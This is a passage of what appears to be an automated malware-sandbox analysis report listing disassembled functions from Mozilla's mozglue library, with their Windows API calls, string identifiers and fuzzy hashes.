                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Process$CurrentInit_thread_footerTerminatestrlen
                                              • String ID: Details$name${marker.name} - {marker.data.name}
                                              • API String ID: 46770647-1733325692
                                              • Opcode ID: d8e3f1ef49e868fb60da53ac407adcf535579a2092ad116e341f2343189d95a7
                                              • Instruction ID: f325dea30420e20c731e645324f2ca6a7faf62084a8193c3bdf5370a031ab464
                                              • Opcode Fuzzy Hash: d8e3f1ef49e868fb60da53ac407adcf535579a2092ad116e341f2343189d95a7
                                              • Instruction Fuzzy Hash: 0D71E471A003069FC704DF28D854AABBBF1FF85314F05466DD8194BB41D771AA98CBE2
                                              APIs
                                                • Part of subcall function 6C4FCBE8: GetCurrentProcess.KERNEL32(?,6C4C31A7), ref: 6C4FCBF1
                                                • Part of subcall function 6C4FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C4C31A7), ref: 6C4FCBFA
                                              • EnterCriticalSection.KERNEL32(6C54E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C4FD1C5), ref: 6C4ED4F2
                                              • LeaveCriticalSection.KERNEL32(6C54E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C4FD1C5), ref: 6C4ED50B
                                                • Part of subcall function 6C4CCFE0: EnterCriticalSection.KERNEL32(6C54E784), ref: 6C4CCFF6
                                                • Part of subcall function 6C4CCFE0: LeaveCriticalSection.KERNEL32(6C54E784), ref: 6C4CD026
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,00001388,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C4FD1C5), ref: 6C4ED52E
                                              • EnterCriticalSection.KERNEL32(6C54E7DC), ref: 6C4ED690
                                              • LeaveCriticalSection.KERNEL32(6C54E784,?,?,?,?,?,?,?,00000000,74DF2FE0,00000001,?,6C4FD1C5), ref: 6C4ED751
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave$Process$CountCurrentInitializeSpinTerminate
                                              • String ID: MOZ_CRASH()
                                              • API String ID: 3805649505-2608361144
                                              • Opcode ID: f021421e23be9f3cbda8ad66750f3454263aee1549be5624a72ccccd237ca506
                                              • Instruction ID: 17913f13d63e30da15e159513f39a8967583a80f98758f1808ad34fac958d07f
                                              • Opcode Fuzzy Hash: f021421e23be9f3cbda8ad66750f3454263aee1549be5624a72ccccd237ca506
                                              • Instruction Fuzzy Hash: 1351D071A047418FD324DF29C894E1ABBF1EBC9319F168A2ED5A9C7B85D770E804CB91
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: __aulldiv
                                              • String ID: -%llu$.$profiler-paused
                                              • API String ID: 3732870572-2661126502
                                              • Opcode ID: 1ecce1aeec349a9a5a376a49cc0e5f392e99b29ceff6840e93f07ff67ff4e284
                                              • Instruction ID: a11eb3bbb3881632ab1335cdefb025088493409edcf84cd175c54c0f01d3460e
                                              • Opcode Fuzzy Hash: 1ecce1aeec349a9a5a376a49cc0e5f392e99b29ceff6840e93f07ff67ff4e284
                                              • Instruction Fuzzy Hash: 09416671A086089BDB08DF78EC5555EBBF5EF85348F108A3DE859ABB81EB3098058791
                                              APIs
                                              • ??0PrintfTarget@mozilla@@IAE@XZ.MOZGLUE ref: 6C53985D
                                              • ?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z.MOZGLUE(?,?), ref: 6C53987D
                                              • MOZ_CrashPrintf.MOZGLUE(ElementAt(aIndex = %zu, aLength = %zu),?,?), ref: 6C5398DE
                                              Strings
                                              • ElementAt(aIndex = %zu, aLength = %zu), xrefs: 6C5398D9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: Printf$Target@mozilla@@$?vprint@Crash
                                              • String ID: ElementAt(aIndex = %zu, aLength = %zu)
                                              • API String ID: 1778083764-3290996778
                                              • Opcode ID: 4d95634a37c0d60ff702496cdbfb94b092b477bc1a50aafd0182445decf535af
                                              • Instruction ID: a513c122c14a341d3bb7a9d76ae16d675a0354204dc56cc1a66cc68df02b30a3
                                              • Opcode Fuzzy Hash: 4d95634a37c0d60ff702496cdbfb94b092b477bc1a50aafd0182445decf535af
                                              • Instruction Fuzzy Hash: 6831F475B00108AFDB14EF59DC44DEFB7A9DF84318F40802DEA2A9BB40DB7159058BE1
                                              APIs
                                              • __aulldiv.LIBCMT ref: 6C514721
                                                • Part of subcall function 6C4C4410: __stdio_common_vsprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,6C503EBD,00000017,?,00000000,?,6C503EBD,?,?,6C4C42D2), ref: 6C4C4444
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: __aulldiv__stdio_common_vsprintf
                                              • String ID: -%llu$.$profiler-paused
                                              • API String ID: 680628322-2661126502
                                              • Opcode ID: 5b737152c4c981cc91b7d5f09702e2074211ad931838eb5bf300984ad4da7d78
                                              • Instruction ID: a80e4e9bf9b3fa91b30cc7b590627f49ae118418833c5e0c148a306ad425a8d3
                                              • Opcode Fuzzy Hash: 5b737152c4c981cc91b7d5f09702e2074211ad931838eb5bf300984ad4da7d78
                                              • Instruction Fuzzy Hash: 3E317C71F042185BDB0CCF6CDC9569EBBE6DBC8318F15853DE8059BB41EB7098058B90
                                              APIs
                                                • Part of subcall function 6C4C4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C503EBD,6C503EBD,00000000), ref: 6C4C42A9
                                              • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C51B127), ref: 6C51B463
                                              • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C51B4C9
                                              • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(FFFFFFFF,pid:,00000004), ref: 6C51B4E4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: _getpidstrlenstrncmptolower
                                              • String ID: pid:
                                              • API String ID: 1720406129-3403741246
                                              • Opcode ID: 56a563e0dd3284e4a84419bfc5337984ec915b16249db596801edc138629da3c
                                              • Instruction ID: ad536a17be6b41d7a7a884d2a9947a93ecfb4f5a92636d8a6eb5739cf1c4b9d7
                                              • Opcode Fuzzy Hash: 56a563e0dd3284e4a84419bfc5337984ec915b16249db596801edc138629da3c
                                              • Instruction Fuzzy Hash: 523125B1A05204CBEB00EFAADC84AAEB7B6FF45308F14452DD801A7F41E771A845CBE1
                                              APIs
                                              • ??0ios_base@std@@IAE@XZ.MSVCP140(?,?,?,?,6C527A3F), ref: 6C4DBF11
                                              • ?init@?$basic_ios@DU?$char_traits@D@std@@@std@@IAEXPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@_N@Z.MSVCP140(?,00000000,?,6C527A3F), ref: 6C4DBF5D
                                              • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(?,6C527A3F), ref: 6C4DBF7E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: U?$char_traits@$D@std@@@std@@$??0?$basic_streambuf@??0ios_base@std@@?init@?$basic_ios@D@std@@@2@_V?$basic_streambuf@
                                              • String ID: Sl
                                              • API String ID: 4279176481-1106240752
                                              • Opcode ID: 50c8afc634a215024f1fc20af355711698ac859446aad5b9de66be42d438f703
                                              • Instruction ID: 03125eb0af3a4ff2f5cc5fcd862784f299334c4592493b34ecc46744fed239d3
                                              • Opcode Fuzzy Hash: 50c8afc634a215024f1fc20af355711698ac859446aad5b9de66be42d438f703
                                              • Instruction Fuzzy Hash: 1911B2792006148FC725DF1CDA99A2AFBF8FB59308315889DE98A8B751D771BC00CB94
                                              APIs
                                              • GetCurrentThreadId.KERNEL32 ref: 6C50E577
                                              • AcquireSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50E584
                                              • ReleaseSRWLockExclusive.KERNEL32(6C54F4B8), ref: 6C50E5DE
                                              • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6C50E8A6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ExclusiveLock$AcquireCurrentReleaseThreadXbad_function_call@std@@
                                              • String ID: MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL
                                              • API String ID: 1483687287-53385798
                                              • Opcode ID: f33b9df1595d066de4cafadbc2b2ff01d08d9d72de945885e29bd4112d305f02
                                              • Instruction ID: 81f8f68ec5c37c7b490bd46f7b274d4061002007a7d239c1ca6ba714ab363bad
                                              • Opcode Fuzzy Hash: f33b9df1595d066de4cafadbc2b2ff01d08d9d72de945885e29bd4112d305f02
                                              • Instruction Fuzzy Hash: FF118E31604654DFCB00AF18CC49A5ABBB4FBC932CF568619E89587650DBB0A805CBD9
                                              APIs
                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C510CD5
                                                • Part of subcall function 6C4FF960: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C4FF9A7
                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C510D40
                                              • free.MOZGLUE ref: 6C510DCB
                                                • Part of subcall function 6C4E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C4E5EDB
                                                • Part of subcall function 6C4E5E90: memset.VCRUNTIME140(ewRl,000000E5,?), ref: 6C4E5F27
                                                • Part of subcall function 6C4E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C4E5FB2
                                              • free.MOZGLUE ref: 6C510DDD
                                              • free.MOZGLUE ref: 6C510DF2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: free$CriticalSectionstrlen$EnterImpl@detail@mozilla@@LeaveMutexmemset
                                              • String ID:
                                              • API String ID: 4069420150-0
                                              • Opcode ID: 69e9a221aa8524e471f6e46d4f4ec66ca6ed64e0db48204db0a9aef4f20d39c2
                                              • Instruction ID: 0c3e79be08e86128b8a3adb83da67e7dbb3498e354e34e60dd8a321ff8692243
                                              • Opcode Fuzzy Hash: 69e9a221aa8524e471f6e46d4f4ec66ca6ed64e0db48204db0a9aef4f20d39c2
                                              • Instruction Fuzzy Hash: 8C41277191D7908BE720CF29C48479AFBE5BFC9714F118A2EE8D887B50D7709855CB82
                                              APIs
                                              • EnterCriticalSection.KERNEL32(6C54E7DC), ref: 6C500838
                                              • memset.VCRUNTIME140(?,00000000,00000158), ref: 6C50084C
                                              • EnterCriticalSection.KERNEL32(?), ref: 6C5008AF
                                              • LeaveCriticalSection.KERNEL32(?), ref: 6C5008BD
                                              • LeaveCriticalSection.KERNEL32(6C54E7DC), ref: 6C5008D5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalSection$EnterLeave$memset
                                              • String ID:
                                              • API String ID: 837921583-0
                                              • Opcode ID: cac679dd00197a1bef552499b0f555a7187fa9c6612d68cf849ccf1bb410ce26
                                              • Instruction ID: f58d38ddd713f33c9f8292879aa9b5fcda84e3c0c32e446dac0cb6bc18080182
                                              • Opcode Fuzzy Hash: cac679dd00197a1bef552499b0f555a7187fa9c6612d68cf849ccf1bb410ce26
                                              • Instruction Fuzzy Hash: CF21D031B012498BEB04EF65DC48FAEB7B9BFC5708F504529D909E7A00DB71A8048BD4
                                              APIs
                                              • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C50DA31,00100000,?,?,00000000,?), ref: 6C51CDA4
                                                • Part of subcall function 6C4DCA10: malloc.MOZGLUE(?), ref: 6C4DCA26
                                                • Part of subcall function 6C51D130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C51CDBA,00100000,?,00000000,?,6C50DA31,00100000,?,?,00000000,?), ref: 6C51D158
                                                • Part of subcall function 6C51D130: InitializeConditionVariable.KERNEL32(00000098,?,6C51CDBA,00100000,?,00000000,?,6C50DA31,00100000,?,?,00000000,?), ref: 6C51D177
                                              • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C50DA31,00100000,?,?,00000000,?), ref: 6C51CDC4
                                                • Part of subcall function 6C517480: ReleaseSRWLockExclusive.KERNEL32(?,6C5215FC,?,?,?,?,6C5215FC,?), ref: 6C5174EB
                                              • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C50DA31,00100000,?,?,00000000,?), ref: 6C51CECC
                                                • Part of subcall function 6C4DCA10: mozalloc_abort.MOZGLUE(?), ref: 6C4DCAA2
                                                • Part of subcall function 6C50CB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C51CEEA,?,?,?,?,00000000,?,6C50DA31,00100000,?,?,00000000), ref: 6C50CB57
                                                • Part of subcall function 6C50CB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C50CBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C51CEEA,?,?), ref: 6C50CBAF
                                              • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C50DA31,00100000,?,?,00000000,?), ref: 6C51D058
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                              • String ID:
                                              • API String ID: 861561044-0
                                              • Opcode ID: 2d21cd7d4c1652331183f022eef1567dd475f100313ff1374b8ebcd631b8969a
                                              • Instruction ID: 073b7a05f82a9726ca89e4826b7df3fe2707849648d7165c9965a028ee4945b5
                                              • Opcode Fuzzy Hash: 2d21cd7d4c1652331183f022eef1567dd475f100313ff1374b8ebcd631b8969a
                                              • Instruction Fuzzy Hash: 0ED16071A04B469FD708DF28C884B99F7E1BF89304F01866DD85987B51EB31B965CBC1
                                              APIs
                                              • memcpy.VCRUNTIME140(?,?,?), ref: 6C4D17B2
                                              • memset.VCRUNTIME140(?,00000000,?,?), ref: 6C4D18EE
                                              • free.MOZGLUE(?), ref: 6C4D1911
                                              • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4D194C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: _invalid_parameter_noinfo_noreturnfreememcpymemset
                                              • String ID:
                                              • API String ID: 3725304770-0
                                              • Opcode ID: 0c2101b83cb774fad85229cb9b503c4c7b65af5ca1b7be7be48642f2af595b99
                                              • Instruction ID: 14959fd244517a46f5ba5df9c6f8a2079e5cc40caf5b05bfd7e057b4a9fa4d81
                                              • Opcode Fuzzy Hash: 0c2101b83cb774fad85229cb9b503c4c7b65af5ca1b7be7be48642f2af595b99
                                              • Instruction Fuzzy Hash: 9381C070E102059FCB08DF68D8A4DAEBBB1FF89324F05456DE815AB750D730E845CBA2
                                              APIs
                                              • GetTickCount64.KERNEL32 ref: 6C4E5D40
                                              • EnterCriticalSection.KERNEL32(6C54F688), ref: 6C4E5D67
                                              • __aulldiv.LIBCMT ref: 6C4E5DB4
                                              • LeaveCriticalSection.KERNEL32(6C54F688), ref: 6C4E5DED
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: CriticalSection$Count64EnterLeaveTick__aulldiv
                                              • String ID:
                                              • API String ID: 557828605-0
                                              • Opcode ID: 78559c93c28ccac96a38122764371835343ceb05112aac0590169c4e195395c0
                                              • Instruction ID: 64c233df9dbff64a5446ac7d92b0b49fb56a481ae97b4307f3875062f4017bce
                                              • Opcode Fuzzy Hash: 78559c93c28ccac96a38122764371835343ceb05112aac0590169c4e195395c0
                                              • Instruction Fuzzy Hash: 57514C71E001298FDF08DFACC854EAEBBB2FB89319F2AC619D815A7750C7706945CB94
                                              APIs
                                              • memcpy.VCRUNTIME140(?,-000000EA,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4CCEBD
                                              • memcpy.VCRUNTIME140(?,?,?,?,?,?,?), ref: 6C4CCEF5
                                              • memset.VCRUNTIME140(-000000E5,00000030,?,?,?,?,?,?,?,?), ref: 6C4CCF4E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: memcpy$memset
                                              • String ID: 0
                                              • API String ID: 438689982-4108050209
                                              • Opcode ID: fd1804b730755c4ac5ab90007569e083df1e5d70df05fe4e6119ee775addd1b1
                                              • Instruction ID: a6912d96475ee50458ecee72ee79c9bd10fe4abb09c170ad5b29333ed66df7bd
                                              • Opcode Fuzzy Hash: fd1804b730755c4ac5ab90007569e083df1e5d70df05fe4e6119ee775addd1b1
                                              • Instruction Fuzzy Hash: A551F375A002168FCB00CF18C890EAABBA5EF99304F19859DD8595F391D771AD06CBE0
                                              APIs
                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5277FA
                                              • ?StringToDouble@StringToDoubleConverter@double_conversion@@QBENPBDHPAH@Z.MOZGLUE(00000001,00000000,?), ref: 6C527829
                                                • Part of subcall function 6C4FCC38: GetCurrentProcess.KERNEL32(?,?,?,?,6C4C31A7), ref: 6C4FCC45
                                                • Part of subcall function 6C4FCC38: TerminateProcess.KERNEL32(00000000,00000003,?,?,?,?,6C4C31A7), ref: 6C4FCC4E
                                              • ?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C52789F
                                              • ?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C5278CF
                                                • Part of subcall function 6C4C4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C4C4E5A
                                                • Part of subcall function 6C4C4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C4C4E97
                                                • Part of subcall function 6C4C4290: strlen.API-MS-WIN-CRT-STRING-L1-1-0(6C503EBD,6C503EBD,00000000), ref: 6C4C42A9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1882874992.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C4C0000, based on PE: true
                                              • Associated: 00000000.00000002.1882852617.000000006C4C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1882998350.000000006C53D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883061502.000000006C54E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.1883102407.000000006C552000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_6c4c0000_SecuriteInfo.jbxd
                                              Similarity
                                              • API ID: String$Double$Converter@double_conversion@@$DtoaProcessstrlen$Ascii@Builder@2@Builder@2@@Converter@CreateCurrentDecimalDouble@EcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestTerminateV12@
                                              • String ID:
                                              • API String ID: 2525797420-0
                                              • Opcode ID: deaf244144a08bd2ace9fc01688bbf606c62702d0f301e6db279e1c7786f3878
                                              • Instruction ID: 969bf2917cf982650618789e68af8ce4cf2cad52449db266ef7d850f284d4afa
                                              • Opcode Fuzzy Hash: deaf244144a08bd2ace9fc01688bbf606c62702d0f301e6db279e1c7786f3878
                                              • Instruction Fuzzy Hash: DE41A0719047469BD300DF29D88096AFBF4FFCA354F204A1DE4A987690EB70D559CBD2
                                              APIs
                                              • moz_xmalloc.MOZGLUE(00000200,?,?,?,?,?,?,?,?,?,?,?,?,6C5082BC,?,?), ref: 6C50649B
                                                • Part of subcall function 6C4DCA10: malloc.MOZGLUE(?), ref: 6C4DCA26
                                              • memset.VCRUNTIME140(00000000,00000000,00000200,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5064A9
                                                • Part of subcall function 6C4FFA80: GetCurrentThreadId.KERNEL32 ref: 6C4FFA8D
